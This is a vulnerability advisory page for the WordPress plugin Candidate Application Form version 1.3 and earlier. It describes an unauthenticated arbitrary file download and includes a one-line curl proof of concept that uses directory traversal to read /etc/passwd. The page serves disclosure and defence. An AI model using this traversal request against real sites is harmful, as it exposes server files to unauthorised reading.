Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbLarry W. CashdollarWPVDB-ID:446233E9-33B3-4024-9B7D-63F9BB1DAFE0
HistoryJul 12, 2015 - 12:00 a.m.

Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download

2015-07-1200:00:00
Larry W. Cashdollar
wpscan.com
12

0.053 Low

EPSS

Percentile

93.1%

JSON

Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.

PoC

$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

CPENameOperatorVersion
candidate-application-formeq*

Related

cvelist 1
nvd 1
wpexploit 1
nuclei 1
prion 1
cve 1
openvas 1
cvelist
cvelist
CVE-2015-1000005
2016-10-06 14:00:00
nvd
nvd
CVE-2015-1000005
2016-10-06 14:59:05
wpexploit
wpexploit
Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
2015-07-12 00:00:00
nuclei
nuclei
WordPress Candidate Application Form <= 1.3 - Local File Inclusion
2022-02-12 17:38:06
prion
prion
Remote file inclusion
2016-10-06 14:59:00
cve
cve
CVE-2015-1000005
2016-10-06 14:59:05
openvas
openvas
WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)
2020-11-20 00:00:00

0.053 Low

EPSS

Percentile

93.1%

JSON
Related for WPVDB-ID:446233E9-33B3-4024-9B7D-63F9BB1DAFE0
cvelist1nvd1wpexploit1nuclei1prion1cve1openvas1